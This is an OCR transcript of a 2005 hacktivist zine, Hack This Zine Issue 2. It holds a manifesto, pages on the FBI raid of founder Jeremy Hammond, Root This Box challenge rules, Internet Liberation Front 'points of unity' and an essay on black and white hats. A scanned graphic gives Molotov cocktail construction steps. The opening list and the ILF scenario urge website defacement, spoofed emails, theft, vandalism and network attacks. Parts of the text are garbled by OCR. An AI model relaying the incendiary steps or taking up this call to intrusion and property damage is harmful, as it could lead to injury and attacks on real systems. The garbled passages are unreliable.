Full text of "Hack This Zine - Issue 2"

Call in sick. Skip school. Go do something you always wanted to do. Take ove^ an intersection with a bunch of people and music antfu§rt/&rt a dance party. Send fake emails posW^t as your Kft§sGS n feLnd announce raises for ev- erybody. Get that wofli 1 ^ have otherwise been thrown away and givje^^ to peopl^ ^ho need it. Fuck with rich people. Say hi hfr^htP very one pass on the jptereet . Cross out words like wtppression,{ exploitation and boredom in every dictionitV • Write ^@ur own music and play it for free. Orqanrl^P^k'; local &n.ti-capitalist collective ^ exploi Mine ^ to strike terror lip = tjpp hearts^f the bosses and rul- ers. Ca^lir^pmeone on- rfe^ir shit ^verytime when they say somethifi]g Ft^feist , sexiSt -.or homophobic .^^r^e your own newsletter.... Qp everybody'"' in .an IRC. channel . Do graf- riJ _ . , /wat -t .nqaow/nash/Sguid riow+lrriinute . fiti to add iifjg^ you^ m x,Qwn. Help the elderly cross the street. Wh^/^ e ^p^ walk, or take public t r a n s' r pm tpfcLEtf 9.]o)n instead of using a car. Re- fuse to always be a? ^]J>@yte^1tttH * Call someone you haven't talked to in a while. ^^iffA^^^^ e ^ i ^ ard listS and donate money to charities*. Heckle your boss and/or union bureaucrat wheneve^o]^^!^^ free open source alternative to aPUtd<ifMinertilial software applica- tion. Participate in a ity gar- den in an abandoned lot .^^^^e.^thers on historical revolutionaj^Qi^plieavals ^ ;f§tft]4a jbuckets and use them as drums EjeteacltlaA hflsirefc rpOTD^^1^biinditmjc^eoj±|tutkR3 r re lively . Hack a corporSJt^br goverflfK^W'^ebsite and fill it with anti-capitalist messages. Start a radical cheerlead- ers squad. Write "This is your death" on every piece of money you can. Sneak your own art into museums. Steal books from big ers. TrainlW^ signs, add stickers talism' , etc Squat a vacarf see them, window. S en^:o strang- udx^. On stop "sexism' , A capi- everything . verytime you a brick through a^major corporation' s nization file orga- 'r^tPtJT^Wlfe system. Steal someone's heSrt for a day. Falsify invitations to a yuppy art gallery and pass them out to the homeless. Celebrate every holiday of all countries and culture. Moi#a from IN THIS ISSUE... FBI Raids Hack This Site Founder Jeremy Hammond Project organizer Xec96 targetted by law enforcement: apartment raided, equipment seized. Right Wing Hackers Target IndyMedia Network HTS exposes fascist hackers and defends free speech on the net Security Culture: Hackers in an Age of FBI Intimidation How to protect ourselves: becoming anonymous, knowing our rights, and how to deal with the law. Finding and Exploiting PHP Vulnerabilities Remote intrusion techniques by exploring web script vulnerabilities Hacking Local Mac OS X Privilege escalation and other tricks and vulnerabilities in OS X. Communication and Info Gathering during Protests Police scanners, SMS messaging, black bloc tactics Hacktivism with the Internet Liberation Front Organizing politically motivated hackers against unjust corpora- tions and governments. anti-(c)opyright 2005 HackThisSite.org awe NOTES FROM THE HACKER UNDERGROUND a hacktivist manifesto 01 major hack this site milestones 02 TUNE IN: HAPPENINGS IN THE SCENE hack this site founder raided by fbi 04 right wing hackers target indymedia network 06 directnic enforces icann whois contact info accuracy 06 phpbb 2.10 disclosure cause mischief and mayhem on the net 07 nmap developers intimidated by fbi... by wyrmkill 07 ARM YOURSELF: EXPLOITS AND TECHNIQUES the art of the cipherer.. by psyche 09 finding and exploiting php script vulnerabilities 10 hacking local mac os x 14 c compilation on a low level... by forcemaster 16 security access, backdoors and gaining permissions 17 TAKE ACTION: HACKTIVISM IN PRACTICE join revolution, live happier 19 security culture: hackers living in an age of fbi repression 20 police state usa and the politics of fear 24 bringing it to their door: civil disobedience @ inaugurations 26 paradise engineering, political change... by archaios 27 communication and info gathering at a protest ... alxciada 28 beyond physical borders: hacking and activism on the net. by fetus. 30 white and black. . .by shardz@dikline 32 autonomous hacktivism with the internet liberation front 33 NATIONAL SECURITY ALERT: SUBVERSIVE MATERIALS ENCLOSED The government considers your very interest in this subject to be thought crime. Soon you will not even be able to create or distribute these text files without being made into a criminal by the corporate media and law enforcement policies. The texts enclosed contain stories, projects, and ideas from people who have found ways to unplug themselves and hack the system. You can take these materials to use and distribute however you like. We can give you ammunition, but only you can set yourself free. Turn off your television and take to the streets. Get involved! (oci up tfieyodce ancfcaCCtfie hcCsl hacker conventions DEFCON 13 July 29-31 , Las Vegas - defcon.org WHAT THE HACK July 29-31 , Netherlands - whatthehack.org Hackers on Planet Earth 6 Summer 2006, New York City - 2600.com 2600 meetings - first friday of every month @ a city near you: 2600, com/meetings free spirits protests Anti-G8 Actions July 6-8, Scotland - dissent.co.uk Biodemocracy 2005 June 18-21st Philadelphia - ReclaimTheCommons.net other events Anarchist Bookfairs and Festivals San Francisco, Madison, Montreal, and More Burning Man August 29 2006, Nevada www.burningman.com Rainbow Gatherings June 1-7, Virginia www.welcomehome.org plug in at indymedia.org or infoshop.org for more actions the usual HTS STAFF Xec96 ikari IceShaman buz archaios hairball whooka html OutThere brOkenkeychain Zortexia alxCIAda mcaster TheAnarchist weekend psyche \alive ZINE TEAM Xec96 alxCIAda Zortexia whooka Fetus Wyrmkill suspects: OTHERS: smooth operator weiznit Morklitu forcemaster BIGC archangel_ dark-angel Truckle Phate Wells THANKS TO hbx networks, Chi- cago 2600, dikline, those who refused to provide state- ments to the feds, IndyMedia, and the fine people at kinkos who helped us steal copies. Zortexia thanks alxCIAda, JK-63 and archangel_ darkangel Summer 2005 DISTRIBUTE ME WIDELY AND WILDLY! This community publication is entirely free to own and free to share. We can only afford to publish a limited amount of copies, so we are counting on people to help pass it on to friends, local computer stores, hacker groups, 2600 meetings, librar- ies, bookstores, newsstands, etc. ANTI-COPYRIGHT INFORMATION Everything provided in this publication is anti-©opyright. feel free to use and reuse any of the content provided here in your own projects. You're a part of this movement - spread the word! CONTRIBUTE TO NEXT ISSUE! We are always accepting additions. If you have anything to share about the lat- est exploits, hacktivist actions, or any other happening in the scene, send it in! We accept a variety of different mediums: from writings, images, ascii art, links, technical documents, etc. There are a number of ways you can get involved, from submissions to grammar/editing or graphic design. Check out our zine forums or get in touch with the zine staff. MAIL ORDER Physical copies are available for mail order through Hack This Site's website. Single copies are $5, and 'anti-propaganda' pack- ages which come with five magazines plus a flaming heap of underground newsletters, posters, leaflets, stickers, patches, etc. are available for $25. ELECTRONIC COPIES While we charge for physical copies of the zine to cover production costs, we believe that all information should be free to read and distribute. Electronic copies of the zine are available in a variety of formats on our website. Please distribute to various file shar- ing services, text file collections, etc. Graphical PDF file: the complete magazine with complete graphical layout, ideal for printing additional copies of the zine. See the Do It Yourself Distro below for additional printing instructions. Raw .TXT file: ideal for lynx users or quick and speedy distribution in file sharing ser- vices, BBSs, through email, etc. Forums: Most of the articles in this zine are available at the zine forums on our website in TXT format, where people can add com- ments. DO IT YOURSELF DISTRO! We've received countless stories of HTS people reprinting copies of the zine on their own and giving it away to everyone they know - at school, work, 2600 meetings, etc. Now's your chance to do the same. All you need is access to some printer and PDF cop- ies of the zine. There are two files for the zine: one is the color cover and the other is the black and white inside pages. It is formatted double sided so that when printed it can simply be folded in half If you are using a printer that can only print in single sides, print with one sheet of paper, turn it around and print the second page on the other side repeating for the remaining pages. The cover PDF file is high resolution color and ideally would be best printed on glossy color paper. But if all you have is black and white, then go with it! Assemble the printed pages and use a long style stapler to bind them together. They have these available at universities, copy shops, art and craft stores, etc. If you are distributing copies(especially outside the U.S) and want to make them available to others, let us know so we can announce your information to the Get Local section of the zine website. Get Involved with Hack This Site This movement is entirely what you make of it. We are structured in such a way that allows people to tune in voice their opinions and make decisions about the direction of the site and community. Check us out on IRC, go to national actions and conventions(listed to the right) and get involved! WWW: http://www.hackthissite.org IRC: irc.hackthissite.org #hackthissite (SSL port 7000) E-mail: htsdevs @ gmail.com Notes from the Hacker Underground As our hacking and activist communities grow, the ruling classes will try to react to stop us. We live in an age where our every thought and move is monitored, and to question the injustices of our society are demonized as unpatriotic. The cor- porate media scares the public with images of evil hackers and cyber-terrorists so congress can give more money to law en- forcement and the ministry of peace. The Office of Homeland Security, the USA PATRIOT Act, Total Information Aware- ness. Goerge W. Bush, Dick Cheney, John Ashcroft. The threat of fascism in America is not an impending threat: it's already here, and the lines are clearly drawn. Inevitably those who question and confront the injustices of the political system will become targets for harassment by the rich and powerful. These words are coming to you from some- one who is facing the full weight of these changes first hand. The success of Hack This Site as well as my participation in organizing a number of protest actions has made me a target of law enforcement. My apartment was raided by Chicago FBI who seized all of my equipment and is threatening me with felony charges citing millions of dollars in damage and up to thirty years in jail for a crime that hasn 't even happened. This is the reality of the political system we live in: the rich and powerful have no regard for human rights, and will do ev- erything in their power to crush any sort of resistence against their empire. The feds are in the business of breaking lives and have had no reservations in making the most of these sweep- ing changes. IndyMedia servers are seized by international law enforcement. The FBI questions, raids, and arrests dozens of hackers a year even from here at Hack This Site, HBX Net- works, and various IndyMedia collectives. They grab server logs for servers that host hacker and anarchist websites like In- foshop.org insecure.org, etc. Police arrested over 1800 people at the protests at the 2004 Republican National Convention while the the FBI and the Secret Service investigate key or- ganizers. When they had visited me, they had quoted several comments from Hack This Site's IRC server. The reason why we are being monitored and indimidated is because they know what we are capable of doing if we real- ize our collective power and start doing something about it. The stakes are high, but they aren't unbeatable. The biggest weapon in their arsenal is how they can control people through fear. But every day, we hear stories about people who were smart and brave enough to outsmart them. If we let them walk all over us, then they win. If we organize and put up a fight, then their grip is loosened and the truth may flow freely as the wind and trees. These are the opening shots in a war they say will not end in our lifetime. The struggle to build a free internet and a free society has yielded some amazing results. We have developed open source software, peer to peer file sharing services, secure and anony- mous open publishing systems, and much more than can be explained here. And every time we develop these exciting new technologies that let us pursue our creativity and innovation more freely, the establishment tries to keep up by inventing in- creasingly ridiculous legislation to stop us. But we will always be one step ahead of them: while they react, we create. The balance of power between revolutionary hackers and the reactionary corporate government will exist in various degrees at all times. The problem isn't going away anytime soon. In- stead of spending time fighting amongst ourselves, we need to work together to find solutions. Embrace a diversity of tactics and unite with our brothers and sisters to build a front to com- bat the right wing police state. Not only do we need to build defensive networks to circumvent their security and censor- ship, we need to take direct action and bring an end to the cor- porations and governments that stand in our way. While they are fighting for their paycheck, we are fighting for our lives Hacktivists of the world, unite! If we can do it, anybody can! That's right, we survived to produce our second issue! We put a lot of time and energy to putting this one together, and feel that it represents many of the actions attitudes and lessons we've learned over the past year. You'll find that it has considerably better writings, more interesting tricks, and some amazing happenings. Check em out, drop by IRC some time, send us comments, and think about submitting something for the next issue. We've grown quite a bit in the two years HTS has been around. As talented contributers come and go, we've gotten to the point where the site and community is self-maintaining. As long as we con- tinue to structure ourselves in an equal, open way that encourages users to participate, the project will become unstoppable and live longer than any of us. What happens now is up to you. Major Hack This Site Milestones • First challenges posted on Hulla-balloo.com in May 2002: 10 ba- sic web challenges with a basic top scores section. Gets a surpris- ing amount of usage and feedback with people volunteering to help with the site to make new challenges. • Several unofficial IRC servers and channels are opened • Launches HackThisSite.org in August 2003: • realistic missions with simulated targets and objectives • user contributed articles / external resources • user system that keeps track of missions completed • web based chat system • the 'hack this site' challenge and the hall of fame • HTS staff organization is set up to maintain the various functions of the website(moderate articles, interact with users, post news, configure and develop new features, etc) • HTS IRC server launched, online community explodes • HTS public meetings are set up with set agendas and facilitated discussion for users to meet with staff about future projects of HTS, maintenance, and general hacker chat. • HTS users and staff are inspired to produce several new chal- lenges: in addition to new realistic missions, several new kinds of hacking challenges are introduced. Application Challenges lets you hack away at operating system level challenges. Encryption Chal- lenges gives out a string encrypted with a custom algorithm and people compete against each other to crack it. • Declares "Summer of Resistance" to have Hack This Site actions at several major hacker conventions and protests. • Publishes first hacktivist zine, distributes hundreds through mail, and has them available at various infoshops and conventions for the following months. 24 half-page zine with hacktivist texts and technical articles. • Organizes for the Fifth HOPE convention: 7/9/04: Chicago 2600 people drive up to NYC. Several people sets up radical HTS table selling the zine and gives radical propaganda away. Networks with other activists and hackers, especially gearing up for upcoming protests. • Organizes for DEFCON convention 7/31/04: pick up several HTS people along the way to end up in Vegas. Meets with several local activists and hacking groups. Sells copies of 2600, distributes lots of propaganda, big hacktivism presence. • Visited by Chicago FBI and is questioned regarding violence and disruption at the Republican National Convention protests, hacktiv- ism and DEFCON • Massive Republican National Convention protests, week full of marches and actions, various hacktivist actions, thousands arrested including 2600 and HTS people. About 80,000 registered HTS us- ers • HTS v3 released with complete recoding to accomodate for growth. New database, restructured staff, etc. More stable, interac- tive, and secure. • HTS IRC merges with TopGamers IRC network. Technical lec- tures are organized by users to be held over IRC. • HTS Radio set up with a live radio stream. Active IRC com- munity built around sharing hacker tips and music. Eventually the server was shut down because of bandwidth and drama, but will return later. • HTS developer Jessica discovers and releases the phpbb 2.0.10 highlight injection vulnerability, which spreads like wildfire across the net • Root This Box released: new set of challenges where several users set up machines configured for free range hacking: complex team scoring mechanism, several boxes set up, many real-world hacking skills are shared and learned. • Many HTS members start to interact with more radical and black- hat hacking teams as real world hacking skills increase • Move to new dedicated server to accomodate for growth and bandwidth concerns • HTS Radio relaunched with pre-recorded content. Audio is seper- ated into different 'play lists' which are streamed randomly as well as provided as downloads in radio archives. Collection of various hacker radio shows, convention presentations, indymedia content, timothy leary hippie shit, and unique HTS content. • Major Counter- inaugural DC protest, anarchist actions all over the country, more hacktivist actions • HBX Networks merges with HTS to provide free shell server and HAXOR Radio • HTS breaks off with TopGamers network because of administra- tive differences: sets up IRC on our dedicated machine • FBI raids Jeremy's house in massive investigation: accuses Jer- emy of hacking into protestwarrior.com and threatens credit card fraud charges. • HTS gears up for another summer full of actions: finishing up the next magazine and prepares for the DEFCON convention the next level of hacking challenges www.RootThisBox.org Root This Box is a live hacking challenge where users can practice their attack and defense skills on machines set up for free range hack- ing. People form teams with other users and compete against other teams for control over these machines. When a machine is taken over, the team can put up a message and try to defend the machine against other attacking teams. Tournament Play Points are rewarded to teams based on the number of machines they have control of, what services they have running, and how long they can hold it. At the end of the month, the final scoreboard and team rankings are archived and reset as control over the servers are returned to their original owner to reconfigure and rerelease. How do you play? The object of the game is to be hack and take over a system and gain enough access to modify the hack.html static page in the web root. You have to update this file with the name of your team and your message to the world. For a working hack.html page, check out our example. Our scripts parse these files on an hourly basis and update your team scores in our database. From here, you have to defend the box against other teams who are also trying to take over. The longer you hold the most amount of boxes, the more points you get. Box Submissions The servers in this competition are submissions from users just like you. If you have an extra machine of any kind that you can throw on a network somewhere, consider setting it up for Root This Box! We like a diversity of configurations, hardware specs, and operating systems. Some box owners like to intentionally plant vulnerabilities, backdoors, or outdated software just to make the game more interesting. If you are interested in submitting a machine, please read the setup guide for specific details on how to configure your box for the competition. How to Set up a machine for Root This Box The game depends on having boxes set up and supplied from users just like you. If you have a spare machine lying around near a stable internet connection, consider submitting your box for the challenge. This guide will provide you with specific details and requirements for setting up a system to be entered in the Root This Box competition. System Requirements While you are encouraged to try a diversity of operating systems and configurations, there are some standards that need to be respected in order for it to work properly in our challenge. You are required to have a static IP address or host or some sort of dyndns.org service. You are also required to run some sort of web ser- vice on port 80 that can deliver html files. If you are behind any sort of router or firewall, you need to make sure that it is configured to forward traffic (on at least the ports for the services you want to be running) to your box's local IP address so people can connect in. The machine should be hosted on a relatively speedy and stable internet connection and should be running as much as possible. You also need to put a static html page in your web root called hack, html which our scripts will crawl and parse on an hourly basis for scor- ing purposes. This contains information like who is currently owning the box and what services are running. Fun Options Setting up a box and closing all services is no fun. Many people are putting together various configurations and even known vulnerabilities for users to play with. Of course, you are free to set up the box however you please, but we have a few recommendations. Many people are creating low level accounts and allowing users to ssh or ftp into the box to have at least a low level of access to play around with and to launch further attacks which may elevate permissions. If you choose this route, make sure you set up a cron to reset the pass back to it's default every five minutes or so otherwise someone is going to set it to something else and no one else can connect. If you need any help,you can get a hold of the RTB staff @ the IRC server irc.hackthissite.org (ssl 7000) in #rootthisbox -^tttS GRAFFITI EOHTSSlg Reclaiming public space has been a pasttime of hackers and revolu- tionaries alike. This issue, we're starting a hacktivist graffiti contest. We want to see pictures of your best hacker or activist related tags. I In a world where public space is sold to the highest bidder, graffiti is a medium of expression not controlled by corporations or govern- ment. So grab a can of spraypaint and hit the town! It's amazingly I easy from making stencils to wheatpasting posters to just carrying a 1 sharpie around with you. A blank wall is a blank mind! I Grab a can of spraypaint and hit the town! Send all contributions 1 to xec96 at hackthissite.org. Include an image, your city, and your | name, billboardliberation.com, subvertise.org, radicalgraphics.org sniggle.net Hacker Activist Jeremy Hammond Raided by FBI and Threatened with False Felony Charges On March 17 2005, nine Chicago FBI agents raided and seized all electronic equipment in Jeremy Hammond's apartment. Facing intimidation from both the FBI and the Secret Service, he is being accused of hacking into right- wing website ProtestWarrior.com and stealing credit card numbers. While the website had not been damaged and no credit cards were billed, the FBI is threatening to charge him with fraud and unauthorized access totalling to mil- lions of dollars in damages and up to thirty years in federal prison for a crime that hasn 't even happened. Jeremy Hammond (xec96) was the founder of online hacking community HackThisSite.org which taught network security skills through a series of online hacking challenges. With his coordination the website was able to pub- lish a series of magazines, launch an online hacktivist radio station, and start several hacking competitions. Because it has grown to be increasingly con- troversial, it is facing overblown intimidation from unjust law enforcement policies despite being legal and non-destructive in nature. Jeremy also worked with several local and national anti-war groups to orga- nize for a variety of marches, rallies, and national demonstrations including the Republican National Convention in NYC, the counter-inauguration pro- tests in Washington DC, and dozens of other local Chicago actions. Jeremy Hammond is an innocent man who is being targeted for his participa- tion in the struggle for social justice and the success of the Hack This Site community. His passion and determination to challenge the injustices of the rich and powerful has made him a target of harassment by law enforcement. Please ask the US District Attorney's Office to drop the charges! (J pd3tGS@FrGGJGrGmy.C0rn FreeJeremy.com Legal Defense FreeJeremyNow@gmail.com Contact: Loren Blumenfeld, attorney - 312-939-0140 Contact: Wyatt Anderson, administrator of HTS: wanderson@gmail.com Hack This SitG founder Jeremy Hammond Who is Jeremy Hammond? Jeremy was a political hacker who used his abilities to defend a free internet and a free society. He has founded a number of projects including several progressive newspapers, educational websites, and helped organize a series of political protests. He has worked to defend the IndyMedia project from right-wing hackers by find- ing and fixing several vulnerabilities. While his activities have been ethical and non-destructive, he has found himself a target of law enforcement because he has been brave enough to stand up to the injustices of the political system. Jeremy Hammond was the founder of online hacking community HackThisSite.org which taught network security skills through a series of online hacking challenges. With his coordination the web- site was able to publish a series of magazines, launch an online hacktivist radio station, and start several hacking competitions. While the site has grown it has become increasingly controversial. The site and community is facing overblown intimidation from law enforcement policies, despite being legal and non-destructive in nature. Jeremy also worked with several local and national anti-war groups to organize for a variety of marches, rallies, and national demon- strations including the Republican National Convention in NYC, the counter-inauguration protests in Washington DC, and dozens of other local Chicago actions. How and why is Jeremy being threatened by the FBI? On March 17, 2005, Jeremy's apartment was raided by nine FBI agents who ransacked the plane, seizing all electronic equipment as well as the house phone/address book, the lease, important notebooks, and even an x-box. Since then, Jeremy and his lawyer has been meeting with the US attorney and the FBI. The US gov- ernment says that they will be indicting him with several felony charges related to computer hacking and credit card fraud. Jeremy was also visited by the United States Secret Service on April 13 who checked out his apartment and asked Jeremy a few questions related to his political activities. They were asked by the FBI who tipped them off about Jeremy's protest activities and an- archist tedencies. The SS asked about what political groups he has worked with, what protests he has been to, whether he was going to assasinate the president, etc. The FBI has stated that they have been monitoring Jeremy's ac- tions for at least six months (since Summer '2004) when the FBI first visited Jeremy questioning him about possible disruption and violence at the Republican National Convention protests in NYC late August. The FBI has gone as far as quoting several private con- versations from the Hack This Site IRC server, talked about places Jeremy has been, etc. They also say that they have stopped by his apartment on several occasions to check up and take pictures. His phone and internet connection is almost certainly tapped as the FBI has stated that they will be watching his every action and state- ment. What is Jeremy being accused of doing? The FBI alleges that he is involved with an underground hacking group that has hacked and gained acess to the right-wing website Pro test Warrior and took credit card numbers belonging to people who ordered products off of their online store. The FBI says that he was involved in a plot to make donations from these credit card numbers to various humanitarian charities, civil rights activists, and leftist protest groups. Autonomous Hacktivism with the Internet Liberation Front In the online struggle for social justice, many of our comrades have fallen victim to law enforcement. In order for us to re- main effective, we need to find ways of clearing ourselves of becoming targets of harassment from the rich and powerful. To continue to question and confront the established order, we need to explore more secure models of radical organizing. As part of adopting security culture and becoming anony- mous, we need to organize ourselves in a decentralized way to prevent the ability for single people being busted not take down the entire group. The Internet Liberation Front(ILF), like the Animal and Earth Liberation Front before it, is a tactic to take action anony- mously yet still connect with larger and broader social move- ments. Several ILF cells operating independent of each other with different goals but under the same points of unity allows a diversity of tactics as well as empowering others a way of tuning in and joining the struggle. While the proposed points of unity can serve as a useful guideline for people who are organizing their own hacktivist cells, it is by no means a strict code which demands obedi- ence. People are free to use and reuse this code as they see fit, and are free to make modifications and reuse the name if it suits their purposes. Hacktivists of world, unite! ILF POINTS OF UNITY 1 . We recognize that the established order of corporations and governments stand in the way of achieving an open internet and a free society. 2. We utilize a diversity of tactics in achieving our goals, rang- ing from digital rights hacktivism like building and protecting alternative channels of free secure communication as well as direct action hacktivism against those who are actively work- ing against a free internet. 3. We need to break out of the digital realm and coordinate with and participate in political protests around the world. Our resistence must by global: on the streets and on the net! 4. The very interest in the subject will label yourself as a crimi- nal in the eyes of the state. To protect yourself and others in the movement, we need to facilitate and build a culture of security. Organize in a decentralized anonymous way, communicate se- curely, don't rat on others, and become a ghost. 5. The Internet Liberation Front belongs to nobody and every- body. Anyone who are acting under these points of unity are considered an operative of the ILF, and are free to utilize and build upon the name and ideals. A scenerio: Microsoft is hired by the Chinese government to develop systems that block political websites. First, digital rights hacktivists circumvent their censorship by developing open publishing software(like Freenet, IndyMedia, and file sharing services) so we can communicate securely and anonymously. Then direct action hacktivists orchestrate attacks on both Microsoft and Chinese computer networks while publically releasing the source code to the Windows operating system. Press releases are sent out to the media. The birds chirp. The sun rises. INCENDIARY BDMft ("H0LDTOY COCKTAIL"') I , F ILL A NARROW-HEC K.ED BOTTLE U\l\* GASOLINE, HERDS Eh E. OR Huft.'i/i&LE DIESEL; BETTER STILL . If ShRE&DED SflAP Dft 5audust /.:::fc-. 2. Insert a rag in the bottle until one ewb touches the liqjjtd and the OTHER EXTENDS MORE TltfUl 3Qc<r Ffl<Jrt THE HlH OF THE MTTLE. SEAL THE 90TTLE TIGHTLY VITH A tfftllti DR TAPE. GOMBMNCENDIAFllA ( COCTEL M0LOTOF") t. LlENaR QE QAWtJNA, LUZ BHJL.L.ANTE (.tiE ROSEN; 0 CQWBuSTlHLE mb !>t;l UNA BOTELIA 0€ CUELLO EiilHFCHO, MEJOFt ALN £31 SE L E ANAOE AidiifcHHlH PE MADERA O JAEDM RATA (X>. 2 ihTRO?UClR UN TrtAPQ EN LA BOTELLA I4ASTA QUE UH EXTflEMO POCE EL LlQUICO r Q r RD 5f S sCTi E i\ OA. NO UEUOS DE20CMSBELA LI OCA GELA&OTELLA KfcLL AHHRMtUENTE LA BOTELLA CON UNA ClAlTA O VENDA right wing subversi on Scattered throughout this issue is a series of graphics advocating random acts of destruction and violence. These were made and distributed by the CIA to cre- ate instability and unrest in democratic countries. The US government replaced several governments with right-wing puppet dictators friendly to the interests of the US economic and political system. This pamphlet was called the "Free- dom Fighter" manual. Every day we are bombarded with media that tries to control not only what we think, but what we think about. We care more about Janet Jackson's nipple on television then we do economic inequalities, international instability, or the im- pending energy crisis. The televisions telling us to purchase the latest cleaning products while billions around the world do not have healthy drinking water. Reality TV? Fox News? Fair and balanced? If you want to change society, change yourself. Change the words you use, change the media. Use their propaganda against themselves. Subvert their images. adbusters.org / subvertise.org / radicalgraphics.org abc.net.au/arts/headspace/rn/bbing/trouble/ This paper is designed to explain to people how the secu- rity industry works and why black and white hats both need each other. First off for those of you that say you are grey hats, there is no gray hat. Gray hat is white hat, the issue is quite literally black and(or in this case) white. Im not going to claim either to work for "the industry" as a white hat. Nor will I claim to be part of the black hat scene, but anywayz let's get started. White hats certainly need black hats because without them there would not be a security industry. Also when I say 'white hat' I dont mean sys-admins because sys-admins are just doing their job. Im talking about people like Lance Spitzer (Project Honeynet), or David Litchfield, who I like some of the papers of I just dont think when he talks about SQL passwords and how to crack them, he should write an accompanying tool that will be most likely used by script kids than sys-admins. Lists like BuqTraq and other full dis- closure lists have to be the most counter productive things ever created, but the also prove the point that white hats need black hats. Lists like the aforementioned do more harm than good, the number of script kiddies that are nutured and en- couraged by these lists far out weighs the number of patches written and holes closed. However without such support such lists would quickly become irrelevant since noone would be hacking boxes, security would no longer be an issue. If people simply stopped posting to such lists and followed a path of non disclosure and report bugs directly to the ven- dors (or keep them private =)) security would improve dras- tically since kiddies would have nothing to feed off of, thus reducing the attacks. Personally I think projects like pr0j3kt m4yh3m are a rude alert to the white hats that something is terribly awry. Its sad to think that they in their self righteous journey to "secure" the internet, that they are the ones help- ing to make it less secure. Either that or they're in it for the money and know exactly what their doing, I believe its a combination of the both moreso the latter than the former. Black hats, atleast true black hats, don't need white hats in any sense. However if you use a loose interpatation of the term they do, and for this paper black hat will encompass script kiddies as well as the people at the darkest ends of the spectrum. By ignoring the truely talented black hats and focusing more on the kiddies the bond between black and white will become clear. Script kiddies, in their early stages of messing with computers, thrive on white hat mailing lists like BugTraq for their infoz. These lists dumb down every topic and make tools simple enough for them to use on a mass scale. They then go and use these tools to hack comput- ers and leave defacements, or install psybnc, or whatever. Then all of the sysadmins that get owned for not patching their systems within 37 seconds of the BugTraq post com- plain that the security industry sucks and is insecure. Then a huge amount of money is spent to research and discover security bugs. These bugs are then posted to a security mail- ing list where, script kiddies gather tools and infoz and hack more computers. Its a vicious circle that has snowballed out of control. I dont think anyone really learns from these lists: in theory these lists are meant to benefit security by applying pressure to the vendors to patch their systems. Which it does, however the number of sysadmins that avidly read this list are so few that the list is fairly inefficent. Therefore many systems are left unpatched and now many kiddies have a tool they can use to exploit them. The true blackhat hackers that code their own exploits paradoxially enough help the security industry more than the full disclosure white hats. This is because a single blackhat or even a group often with a unreleased exploit will do far less damage than the numer- ous script kiddies with a publically disclosed exploit. The blackhats that dont disclose their exploits may not be help- ing security 100% but they are doing more good by keep- ing their exploits private. The chances of sysadmins getting hacked by a handful of black hat hackers with an exploit is far less than these sysadmins getting owned by a script kid- die with a tool they ripped off some list. (BGffltfll^iQft The real threat when the media, the anti-virus companies, or whoever, mentions "hackers" who they really mean are kids with tools they discovered off of full disclosure lists. Anti-Virus/Security industry is a multi million dollar indus- try that thrives on its colleagues doing security "research", and releasing bugs that kiddies of the virus world can write a devastating worm so that the public will buy thier product. But you might ask if the vulnerblities were known about how come the worm or whatever was so devastating? Because people dont patch thier systems. Almost any security breach can be boiled down to an error between the keyboard and the chair. Theoretically if Joe Blow subscribed to BugTraq and patched his systems as the bugs came out full disclosure would be a wonderful system. However the public does not subscribe to BugTraq even most sysadmins don't carefully moniter the integrity of thier systems, that would be a 24 hour a day job. Black hat hackers are not the problem its the industry itself and the white hat full disclosure mentality. And since the industry is spawning legions of "hackers" a day they will never go away. Thus the industry is the only problem in this equation that can be solved. The kiddies ar- ent going away. The blackhats arent disclosing. But the white hats seem to be the root of all the problems. After reading this paper you may be wondering where my stance is, what "hat" I wear since before I said I was neither a white hat or a black hat. And the answer is, rogue hat. A rogue is simply a hacker that looks out for himself, and thier group. We dont have stereotypially agendas. We are not in it just to learn, or to help improve security. We are not in it to cause mayhem or make money. We are simply in it. Finally I will leave you all with a question. Since when did we start calling the security "scene" an industry? shardz@dikline _A_ W/ /_A_\ V These charges are outrageous and reactionary because none of this has actually happened. The website has not been defaced and no credit card numbers has been billed. The FBI and the US Attorney has quoted several million dollars of damages(~ $500 per credit card) and is threatening up to thirty years in federal prison for a crime that has not been committed. Who is ProtestWarrior? ProtestWarrior.com is a right-wing group that tries to provoke and disrupt constitutionally protected protests and actions of progres- sive organizations. They foster such conservative and intolerant dogma which borders on abusive hate-speech. Their most recent national action was their attempt to cause trouble at the counter-in- auguration protests in Washington DC where they failed miserably in being effective or generating any decent numbers of supporters. Although no damage had been done to their system, the Protest War- riors have been known to falsely report information to the police on an intempt to incriminate and demonize leftists. This particular case is similar: while no damage has been done to the website or credit cards, ProtestWarrior is trying to demonize and incriminate hackers and activists. What is ironic is that ProtestWarrior has worked with groups like RightWingExtremist.net and the gOOns to hack Indy- Media and other leftist sites in the past. Read an in-depth discussion of ProtestWarrior, what they stand for, and how to expose them: http://indymedia.us/en/2005/03/5268.shtml References This is a short list of documents and reading materials related to federal law and cybercrime. "Everything a Hacker Needs to Know about Getting Busted by the Feds " - http://www.grayarea.com/agsteal.html A general introduction to federal law as related to hacking and cybercrime from Agent Steal who served 36 months for simi- lar charges. 1030: Computer Fraud and Abuse Act - http.V/caselaw. Ip.findlaw. com/casecode/uscodes/18/parts/i/chapters/4 //sec- tions/section^ 030. html Title 18 Part I Chapter 47 Section 1030 - Fraud and related activity in connection with computers. Criminal charges for unauthorized access. Cyber Security Enhancement Act of 2002 - http.V/www.cyber- crime.gov/homeland_CSEA.htm Additions from the Homeland Security Act which make chang- es to the Computer Fraud and Abuse Act which strengthen the penalties and surveillance capabilities of law enforcement Searching and Seizing Computers and Obtaining Electronic Evidence in Criminal Investigations - http://www.usdoj.gov/ criminal/ cybercrime/ searching.html Contacts If you would like to know how you can support Jeremy or if you have any information that can be helpful to his case, please get a hold with someone on the legal support team. The email address FreeJeremyNow@gmail.com is shared with several friends and family members. This is the best bet in seeing that your infomation is made available to everyone on the team. For quicker results, you may need to get a hold of someone directly using the information below: Loren Blumenfeld, Jeremy's lawyer, is available at his office phone at 312-939-0140 Wyatt Anderson, admin ofHackThisSite.org who works with Jeremy on the site, can be reached at wanderson@gmail.com. What property has the FBI seized? Nearly everything electronic has been seized from their house, in addition to a number of private notes and documents including notebooks as well as a copy of their lease. In addition to taking Jeremy's property, they have also seized his roommate's computers and other equipment which were unrelated to the incident. Details of all property seized are included in the search warrant receipt. While it has been more than two months since the original inci- dent, the FBI has not filed charges nor returned any property. We are sending out an official Motion for Return of Property, which the FBI is required to do under Rule 41(e) of the Federal Rules of Criminalal Procedure. How could I support the case against these ridiculous charges? Support can range from signing the online petition, making a do- nation, contacting the US Attorney, or just by spreading the word about Jeremy's situation. Please see the support page for more de- 